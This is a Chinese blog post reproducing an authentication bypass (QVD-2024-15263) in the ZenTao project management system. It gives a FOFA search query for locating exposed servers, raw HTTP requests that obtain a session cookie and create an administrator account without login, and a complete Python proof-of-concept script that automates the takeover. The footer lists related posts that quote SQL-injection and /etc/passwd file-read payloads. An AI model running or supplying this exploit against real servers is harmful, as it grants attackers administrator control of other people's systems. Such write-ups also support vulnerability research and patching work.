【漏洞复现】禅道——未授权登入(QVD-2024-15263)

已于 2024-07-09 16:23:54 修改
阅读量385 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: 渗透测试
于 2024-07-06 00:02:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LongL_GuYu/article/details/140219622
版权

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

漏洞描述

禅道(Zentao)是一款开源的项目管理和协作软件。禅道项目管理系统中的存在QVD-2024-15263身份认证绕过漏洞。攻击者可利用该漏洞创建任意账号实现未授权登录。

漏洞复现

1)信息收集
fofa:title=“禅道”
2)本地复现
源码下载:https://dl.zentao.net/zentao/18.11/ZenTaoPMS-18.11-php7.0.tar.xz
在这里插入图片描述
3)先构造数据包,获取cookie

GET /zentaopms/www/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host:ip

在这里插入图片描述

Set-Cookie: zentaosid=c5gfr88h22f4vv73h4d0b453mv;

4)构造数据包,创建账户

POST /zentaopms/www/api.php/v1/users HTTP/1.1
Host:ip
Cookie: zentaosid=c5gfr88h22f4vv73h4d0b453mv; lang=zh-cn; device=desktop; theme=default

{"account": "longl", "password": "Qwe123", "realname": "longl", "group":"1"}

"group":"1"为管理员分组
在这里插入图片描述

5)登入账号
账号:longl
密码:Qwest23
在这里插入图片描述
成功登入

测试工具

poc

# -*- coding: UTF-8 -*-
# !/usr/bin/python

import requests
import re
from bs4 import BeautifulSoup

def getCookie(host):
    """
    通过发送请求获取Set-Cookie头部信息。
    
    :param host: 目标主机地址
    :return: 获取到的Cookie字符串
    """
    # 构造请求URL,需要根据实际路径进行修改
    url1 = "http://" + host + "/zentaopms/www/"
    url = url1 + "/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=fkazcfyqgknhqdkbpttl&branch=qkkcluybdvfxqngbemmn"
    # 设置请求头部信息
    headers={
        "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language":"zh-CN,zh;q=0.9",
        "Host":host}
    # 发送GET请求并获取响应
    response = requests.get(url,headers=headers)
    # 从响应头部获取Set-Cookie值
    SetCookie = response.headers.get('Set-Cookie')
    return SetCookie

def addUser(SetCookie,host):
    """
    使用给定的Cookie添加新用户。
    
    :param SetCookie: 用于身份验证的Cookie字符串
    :param host: 目标主机地址
    :return: 请求的响应对象
    """
    # 构造添加用户的API请求URL,需要根据实际路径进行修改
    weburl = "http://" + host + "/zentaopms/www/api.php/v1/users"
    # 设置请求头部信息,包括Cookie
    headers = {
        "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language":"zh-CN,zh;q=0.9",
        "Host":host,
        "cookie":SetCookie}
    # 设置请求超时时间
    timeout = 8
    # 设置待添加用户的参数
    # 账号、密码、真实姓名、角色、用户组
    data = {'account': '3213111',
            'password': '123456Qa',
            'realname': '3213111',
            'role': 'top',
            'group': '1'}
    # 发送POST请求添加用户
    res = requests.post(weburl,headers=headers,data=data,timeout=timeout)
    return res

def main():
    """
    主程序入口。
    """
    # 目标Web地址
    weburl = "192.168.2.8"
    host = str(weburl)
    # 获取Cookie
    SetCookie = getCookie(host)
    # 检查是否成功获取Cookie
    if SetCookie == None:
        print("获取Cookie失败,漏洞可能已被修复。\n")
    else:
        # 截取前43个字符,因为实际使用的Cookie可能较长,此处只取前缀
        set_cookies = SetCookie[:43]
        # 使用Cookie添加用户
        res1 = addUser(set_cookies,host)
        # 检查用户添加是否成功
        if str(res1.status_code) == "400":
            print("账号可能已存在,请尝试更换用户名。\n")
        else:
            print("账号已生成。")

if __name__ == '__main__':
    main()

运行截图
在这里插入图片描述
使用生成的账号进行登入即可。

冬天之所以那么冷是为了告诉大家身边人的温暖有多重要。

Long._.L
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
禅道项目管理系统RCE漏洞复现+利用
0xSec
02-01 1万+
2023年1月6日,互联网披露其旧版本中存在权限绕过与命令执行漏洞,攻击者可在无需登录的情况下构造恶意请求执行任意命令,控制服务器。
禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)
m0_46604997的博客
06-05 564
1.1、基本信息禅道是一款支持敏捷、瀑布、看板等多种项目模型的开源项目管理软件,可完整覆盖研发项目的需求、任务、缺陷、用例、质量、组织知识库等流程。禅道提供多个版本,包括免费的开源版、付费的企业版、旗舰版、IPD版和云禅道,以及DevOps平台版,满足不同行业和规模的项目管理需求。1.2、问题描述禅道系统存在身份认证绕过,在处理某些API时能有效检查用户身份,允许认证的用户执行某些操作,从而绕过鉴权机制。
禅道项目管理软件企业版 4.0.2
09-21
禅道是一款国产开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整覆盖了研发项目管理的核心流程。禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的API可以调用。禅道,专注研发项目管理!
禅道身份认证绕过漏洞(QVD-2024-15263)复现
最新发布
fly夏天的博客
06-19 874
QVD-2024-15263 禅道身份认证绕过漏洞复现和原理介绍。
禅道项目管理系统存在远程命令执行漏洞(RCE)
nnn2188185的博客
04-14 3198
禅道是第一款国产的开源项目管理软件,也是国内最流行的项目管理软件。该系统在2023年初被爆出在野命令执行漏洞,官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于禅道项目管理系统权限认证存在缺陷导致,攻击者可利用该漏洞授权的情况下,通过权限绕过在服务器执行任意命令。
禅道研发项⽬管理系统授权RCE漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-09 949
Zendao禅道是第一款国产的开源项目管理软件,他的核心管理思想基于敏捷方法scrum,内置了产品管理和项目管理,同时又根据国内研发现状补充了测试管理、计划管理、发布管理、文档管理、事务管理等功能。
【组件攻击链】禅道项目管理系统(ZenTaoPMS)高危漏洞分析与利用
further_eye的博客
12-21 4626
近年来禅道漏洞频发,从2018年开始,每年都会爆出比较严重的高危漏洞,通过这些高危漏洞均可对服务器造成一定的影响,甚至可以获取服务器的最高权限。
禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)POC
05-10
禅道身份认证POC测试payload
WPS Office 代码执行漏洞(QVD-2023-17241)
08-13
**WPS Office 代码执行漏洞 (QVD-2023-17241) 深度解析** WPS Office 是一款由金山软件开发的办公软件套装,包括文字处理、电子表格、演示文稿等多种组件,广泛应用于个人和企业环境中。然而,随着软件的普及,安全...
Python库 | qvd-0.0.8-cp37-none-win_amd64.whl
04-03
资源分类:Python库 所属语言:Python 资源全名:qvd-0.0.8-cp37-none-win_amd64.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | qvd-0.0.7-cp37-none-win_amd64.whl
04-03
资源分类:Python库 所属语言:Python 资源全名:qvd-0.0.7-cp37-none-win_amd64.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
禅道项目管理系统 身份验证漏洞分析QVD-2024-15263
shelter1234567的博客
05-03 1308
最近不怎么更新了!向小伙伴说明下 我不是什么组织 更不什么经销号(尽管csdn有很多经销广告号)一确实是下岗了!忙着为找工作而发愁。简历都投出去如同石沉大海能不愁吗!.哎......二是忙着论文及材料的事....三是也看了最近的漏洞,感觉也没啥可分析的 一眼就看出问题所在。有什么可分析的呢!就像医生看看患者如同看萝卜白菜一样.....,那分析反序列化链呢,这也没什么意思啊!话说到此,今儿个就推荐你看这篇文章。有一定难度挑战度,内容还是跟以前一样,以一个挖洞者的视角来讲解分析。
禅道系统权限绕过与命令执行漏洞分析
C20220511的博客
03-09 1923
权限绕过的关键点在module/common/model.php文件中checkPriv函数,此函数是检查权限的函数,验证当前登陆用户是否有访问module与method的权限。经过代码审计发现captcha函数可以直接写入一个自定义key的session,此段代码本意是设置生成一个自定义session的key的验证码,开发者应该是想写一个公共的验证码生成函数让其他开发者做新功能需要的时候可以直接调用,正好可以利用生成一个key为user的session。后面加上exit();来修复权限绕过漏洞
禅道 11.6版本 后台漏洞 复现和审计
weixin_45427650的博客
04-04 2932
文章目录查看版本漏洞sql注入任意文件读取rce 禅道 11.6版本下载地址 本次复现环境windows 先搞清楚禅道参数的传递方式,进入index.php慢慢看 先发现了这个语句: 这个导致禅道的查看版本信息的漏洞 跟进看一下 查看版本漏洞 复现payload:http://ip/zentao/index.php?mode=getconfig 跟进exportConfig() 文件位置:zentao\framework\router.class.php 调用父类的exportConfig()
禅道项目管理系统远程命令执行漏洞
qq_18209847的博客
01-12 1241
禅道项目管理系统远程命令执行漏洞禅道是第一款国产的开源项目管理软件,它的核心管理思想基于敏捷方法 scrum,内置了产品管理和项目管理,同时又根据国内研发现状补充了测试管理、计划管理、发布管理、文档管理、事务管理等功能,在一个软件中就可以将软件研发中的需求、任务、bug、用例、计划、发布等要素有序地跟踪管理起来,完整地覆盖了项目管理的核心流程。
禅道项目管理系统身份认证绕过漏洞
huangyongkang666的博客
04-27 1586
禅道项目管理软件是国产的开源项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,完整覆盖了研发项目管理的核心流程。禅道项目管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后,可以实现完全接管服务器16.x
禅道CMS 11.6漏洞
chaojixiaojingang
09-09 4990
一.SQL注入漏洞 Payload: http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user 二.任意文件读取漏洞 Payload: http://127.0.0.1/zentaopms/www/api-getModel-file-parseCSV-fileName=/etc/passwd 三.远程代码执行漏洞 1)远程代码执行命令phpnifo(); P
pymssql中执行sql sever为什么会乱码_禅道免登陆SQL注入漏洞复现
weixin_39645249的博客
12-12 147
一、漏洞简介该漏洞影响版本为禅道8.2--9.2.1,禅道项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程。漏洞出现在系统orm框架中,在拼接order by的语句过程的时候,对limit部分过滤并直接拼接,导致攻击者构造执行SQL语句。在mysql权限配置不当的情况下,攻击者可利用该漏洞获取w...
qvd-2023-45061漏洞复现
12-25
qvd-2023-45061漏洞是指某个系统或软件中存在的安全漏洞。为了验证这个漏洞,需要进行漏洞复现,即重现漏洞的过程。首先,需要在具有相同环境和配置的测试系统上进行操作。其次,需要根据漏洞的描述和已知信息,尝试触发漏洞并记录操作步骤和结果。在进行漏洞复现的过程中,需要注意保护好测试环境,避免对系统造成实际危害。 在qvd-2023-45061漏洞复现的过程中,可以尝试利用已知的payload或者编写自定义的代码来触发漏洞,记录漏洞触发的条件和效果。在复现过程中,也可以尝试不同的输入和操作,寻找漏洞的边界和影响范围。同时,需要及时记录复现的过程和结果,以便进一步的分析和修复。 当漏洞成功复现后,应该及时向相关安全团队或厂商报告漏洞,并提供详细的复现过程和结果。漏洞复现的结果将有助于安全团队更好地理解漏洞的本质和影响,有助于及时修复和防范类似的漏洞。此外,漏洞复现也是安全研究和攻防技术提升的重要手段,通过复现漏洞可以加深对漏洞原理和利用方法的理解,提高安全防护和应对能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值